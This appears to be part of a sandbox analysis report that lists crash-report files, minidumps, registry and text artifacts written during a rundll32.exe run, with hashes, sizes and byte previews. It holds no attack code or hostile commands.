Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.8.2.9.7.4.1.4.0.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.8.3.2.0.0.7.0.5.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.6.b.9.3.6.2.-.2.d.b.3.-.4.0.3.a.-.a.4.b.5.-.8.2.9.6.c.3.b.6.9.0.6.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.3.f.8.0.5.7.-.c.c.e.d.-.4.9.8.8.-.b.a.0.a.-.a.8.0.c.a.7.b.c.7.a.a.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.4.4.-.0.0.0.1.-.0.0.1.3.-.a.8.e.5.-.8.0.0.e.3.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f48ee1d79ba125ec73679e59d0b16d42546ec4d_7522e4b5_8974e0c5-0254-4f14-aaad-496eda389701\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.953112711261538
Encrypted:	false
SSDEEP:	192:44yiVOm5S0BU/wjeTsuzzuiFVZ24IO84ci:kiMm5ZBU/wjeDzuiFVY4IO84ci
MD5:	A37A096419A5BD015C9AA20C0AFED34E
SHA1:	F42DD354A7B93BAF6AFA0E3014A4AEC7BE97373C
SHA-256:	3B5E15EAE7057CAF43FCD66388A787413E529CBD74C1EE48343ABEA1AD5AE632
SHA-512:	D7E85EABE2D7CE6A94F4D1AF3C01F51A68BB466F96EDA2C920845B0CA0E8A8002E50C44D68B2254853366D9478BAB2687F3F5574A09188218AFC89D6E7F2C0D8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.8.0.1.5.5.8.0.1.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.8.0.6.6.5.1.8.8.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.7.4.e.0.c.5.-.0.2.5.4.-.4.f.1.4.-.a.a.a.d.-.4.9.6.e.d.a.3.8.9.7.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.9.0.f.6.4.e.-.2.0.5.0.-.4.7.3.a.-.b.4.3.d.-.f.8.8.6.f.7.d.7.1.1.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.8.-.0.0.0.1.-.0.0.1.3.-.d.4.7.c.-.2.4.e.8.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.2.d.7.!.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D36.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 3 01:33:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44360
Entropy (8bit):	2.0866387111371716
Encrypted:	false
SSDEEP:	192:yw7dA3EXGm9qHJ/O5H4qSkE+goaawk5z+CDufR35KsTj:V23EMp25HtBE+jaa5585K8
MD5:	F13E98F885881592A27583B4B91F97BF
SHA1:	BC9DE157DF966F370CA98F7DBB6CEC1CA1C1E531
SHA-256:	028FCA3EA64FD23885C2CAC880EA9A4CD28C844833F0D902714E66B24EB6F24A
SHA-512:	BE2FBB7FB6872C4A1DBBDB0E3B6DB1EBD609550F9CCD809A8C6B7D12C0471E608D6D9A99F608D4EC2A96BB0A8CB5D97C3A64A410D848005B6228748D7ADAC4FE
Malicious:	false
Preview:	MDMP..a..... ..........f........................................N/..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T..............f;............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E6F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8280
Entropy (8bit):	3.693228959297844
Encrypted:	false
SSDEEP:	192:R6l7wVeJeN6Lx6YXA6A94gmfTjmpry89bRisfS5bm:R6lXJU6N6Yw6A94gmfTj4RhfJ
MD5:	CA8F1903C0B850AA9724860A9C9E1485
SHA1:	62DF639508456EB4C0CC5C26BD06CF4D5D61E88B
SHA-256:	B539A0CF6E80378EE130CCD93654CDD6CB50766D0B712ACE4F8699A71D730D8C
SHA-512:	3660AE4D1FB360DC1BA9AD1B01E58AE9F854776053F2CD057F392BACE50AA076558348652C8B35D9715D95CB440427EC322FD984E4D4C98AB483C3957A605976
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E8F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4632
Entropy (8bit):	4.452086161790989
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI9eZWpW8VYPYm8M4JCdP2F/qh+q8/anGScSMd:uIjf1I7Eo7VDJI/J3Md
MD5:	2B34F6A1CF2CAE6FCC61F8A9234130F4
SHA1:	5FC68FC3F4B1D55B23D9468DD3CD5CE3A4CBDD3B
SHA-256:	07EF7250FF9DA8046B1D30F2E1A24AC7F38BCE6FE2475CC1C25C0DDBB850BB76
SHA-512:	26AF9179BA3C6D527BB2EE3998C9E36A7939E38118B54EEA8E477E126450739FF39E4174BD85081423B257272B480B8D32E8172C32058005A616D0FDFC28A9D3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526596" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8904.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 3 01:33:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46192
Entropy (8bit):	1.9782412349719667
Encrypted:	false
SSDEEP:	192:307tL3KX2mt8O5H4noy+CygSw5uMT2/GsmbUlvX:EJ3ep5Hw+BgSwUM5bU
MD5:	71B9F5A7FB5333552146B547543521EC
SHA1:	EE48EB808586D25296909C68A2FD76884C95C4CA
SHA-256:	B9B3E5F29B9DC8723E5182BB7EEF34FFF371A8472C092FC0726CEECF175EEC2D
SHA-512:	7CB3399A73813A0D6EA5D5C0DD5C93E7282F71B1F1BCC687342708A59185CDD326901325ADB51399B27D475A199F1DC63B9E74226BA3A1CF07648DD5DBA33814
Malicious:	false
Preview:	MDMP..a..... .......b..f........................................N/..........T.......8...........T...............h...........L...........8...............................................................................eJ..............GenuineIntel............T..............f)............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A9B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8342
Entropy (8bit):	3.688952743304311
Encrypted:	false
SSDEEP:	192:R6l7wVeJfK6Z6YPm6pgmf85mprT89b1ysfJwHm:R6lXJC6Z6Yu6pgmf85f1xfj
MD5:	1BF29DBD415C472A9A3FB41FFF060363
SHA1:	F3BF26D13F5FC7FD7969FDBE2D32062368ED3CD9
SHA-256:	FE591B22B1092BFBB47FEDEECF5EEA41BE9DEB574225B6A34C11CA0EC304E157
SHA-512:	2F01419C725E894675627AC7626EB1248AFBBBFFB823B9079A34146AFC52A39793014824B6618416BC7921AA2969AF54FE42869B689CD5AA2AAC8D0112887FBC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.3.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D0D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4733
Entropy (8bit):	4.438903417016826
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI9eZWpW8VY4SYm8M4JCdPFFZ+q8vjPHGScSnd:uIjf1I7Eo7VzJkKLJ3nd
MD5:	61680766575A6A4F256821F624637558
SHA1:	618F3C515E7EC20764F3962E9EEC2F365FC7543D
SHA-256:	7E2D9CF20E11445F4891623814411A86E53A972C7F00483028928E1FEF95C8B5
SHA-512:	CE6374682D9859F19AB4266022902CAFA96BA263FF673175FF464FDEAC7CA7B01589C2A2B409E7A83A5F037917EABB3F990BC2C5689E8E1DE0F762CC6575320F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526596" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF422.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 3 01:33:49 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	47660
Entropy (8bit):	1.9535928767939497
Encrypted:	false
SSDEEP:	192:ER7T03KXjmyAxZO5H4DATfKs1Bs2JtQI1ks9bb+Z8qL:+c35yIc5HpfnXs23QI1ksMZ9
MD5:	219F839622A7C7D45DAACB9ED16276A0
SHA1:	D6BA830CA30A4609C28E6982CF509F47C24C5369
SHA-256:	0F5B42EB38105F2B61D45B8B44E5105CC9925F014DBDF6BDC1F76419A3606AE9
SHA-512:	86B146DA133B061B711609C7EBA5D27C0D95D0A50D964487A5A100BA80C32DBD64354AE6C56ECFCCFD2813E76A28716477BC5AF03ED16241628D6176F6C53191
Malicious:	false
Preview:	MDMP..a..... .......}..f........................................N/..........T.......8...........T...............t...........L...........8...............................................................................eJ..............GenuineIntel............T.......$......f.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5AA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8284
Entropy (8bit):	3.6924884054143012
Encrypted:	false
SSDEEP:	192:R6l7wVeJej66rEx6YXW6AR4gmfTjmprg89bAvsftAm:R6lXJw66O6YG6AR4gmfTjmAUff
MD5:	7CDE72EADAC1D99A3FACDC29FECA4E9F
SHA1:	5D840DA917FEFB456780F6F7F1953918A877BE60
SHA-256:	A13FB11F1B3125D7A8EE8098939509BFF3B8EBD5C783DF5572D5119B1B4826CC
SHA-512:	4917D3CB878A82236D2866360DD1190484B9DBAE33788274171C93DBDFD6217D6910146A17C4E498E9B849573042833B2A5DEF7188F9CBC1197CAD6EC8106340
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF637.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4632
Entropy (8bit):	4.45301332357255
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI9eZWpW8VYpYm8M4JCdP2FHn+q8/aG2GScSxd:uIjf1I7Eo7VBJx+2J3xd
MD5:	F89F801068111A26EB8B691FF0930E50
SHA1:	99101A6DEAB633C300724C2C89A6FE5C94186C2A
SHA-256:	71DAB246D64F9566D3E4F35F05750C9C6F146E31CF3A3BDF74C2F2D11D4113F8
SHA-512:	67DF50D75F5F9CCBD1E3BED9BC05EE834961ECA1E1A18D2291A52513F590C79538773473E55964EB7DBB5EF29AFD6C717E645E83131FCDF70102D530CBA3161D
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526596" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6E1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 3 01:33:50 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	43560
Entropy (8bit):	2.0615051786757452
Encrypted:	false
SSDEEP:	192:TckRt7hl3KXEmDcnm7O5H4WxEuLrbr3Cpy1636YwBQV5D8:YkzL3IDUf5Hzrbr3eyA6Yno
MD5:	ABAFE77C216121517E79B4D477ABA41B
SHA1:	4B907DDF7B7C97AAC38D965BF1705C60F0A71883
SHA-256:	EC353ABD0CD6DABE923AAC765669F8C5D026C4781F9B4E63E7EB2F1B2A23B6C8
SHA-512:	D491DA8F99C299F32BD51BF31085495C1B8F73C2F35E5DD7FE3A926509D811FDF588F83E60A6F6AF4CB61F978AD733BC62F7FBD216813C4B916F05A6EED294B6
Malicious:	false
Preview:	MDMP..a..... .......~..f........................................N/..........T.......8...........T...............p...........L...........8...............................................................................eJ..............GenuineIntel............T.......D......f.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF934.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8346
Entropy (8bit):	3.6882466613796487
Encrypted:	false
SSDEEP:	192:R6l7wVeJyMjj6jo6YXe6AR4gmf85mprD89bQnsf1Awm:R6lXJVj6U6YO6AR4gmf853Qsf1u
MD5:	AA9B990ED700F564F8D7DBC9B3E08285
SHA1:	EDBA9D73907AA5A593868F685DFE7B15CFEA2DFD
SHA-256:	D0D5BEF1211CBE76169E505A11A4B40B35B42996216B4B9BF7631EB673B63376
SHA-512:	AC2ED1B4F5EF497C16106048469BE781795CD153409EC93233FBAB67406744A626561F167C2F5F523C186009678D8E0A22B51AE231F83AFBEDC019EE4195D69C
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF954.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4733
Entropy (8bit):	4.435685327969549
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI9eZWpW8VYr0Ym8M4JCdPFFF7u+q8vjPthGScSUd:uIjf1I7Eo7VOBJGyKfJ3Ud
MD5:	45F739AFF2046B5EC637C64AA9D375CA
SHA1:	C1DEA16E6F92131D0AF1CCB2BAC07D7E20899D01
SHA-256:	F25ACE0BF96CE32B95E9CBDAC75ABB69790DDCA45099AEE950F81A6C9BFD5FC9
SHA-512:	1DD1B60BE9CCA40EF8925038C34C3028C87B8AD24C1BEB837ADC818C69CDCAD19420E16578288F417BE7F0D1D4AC5F489F6DBE13F3DEBD1A0DA3DD47233D01B1
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526596" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\Desktop\rundll32.txt

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	269
Entropy (8bit):	5.875438322673148
Encrypted:	false
SSDEEP:	6:9xWBVQfflazmVF8IIkvhc8liHwb0Fqzgxx6:KVQ3laO2kJcswxs
MD5:	B7322F34E4C506E2E2C99290902923DD
SHA1:	5883A4D2E3E9D8CE7C54FB060F27283C5BDC7B13
SHA-256:	2A9E8DB7D00AA812ACC87F0DE5174DE0570255E9222A717D98C7308E5020B079
SHA-512:	EB3B962BDCA19AAE690F2230F7729EA3B09E3C54A1922035225A389C0F8CB69BC332CFC11112AF0821B0E2B5AC82D4B693D543B2DF383F1F407DAF392C990A68
Malicious:	false
Preview:	xouwp4Joea0UwBbQIFen2Y6KmcOMqX3gSOBg+EWJ59FCzm00xE/zsGSeYnM9xFT337pPYC65Ks+H4CRCBIgamw==..fUjbvXtX9QSh7FAaacLUNA==..07--02-09..3C17xXdcT27C2uFsnrPCFQ==..mRs78U/K4/2aTs2gwFCZe7GMqsRqbSWQdcva5QZ/o45eZnfvPZMSBrbUR7JKqGDDPeRboybGPAV8vC8RVYk/xw==..YpwZ9zMyTqXNtFHFSEkLKA==..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.2961033020137025
Encrypted:	false
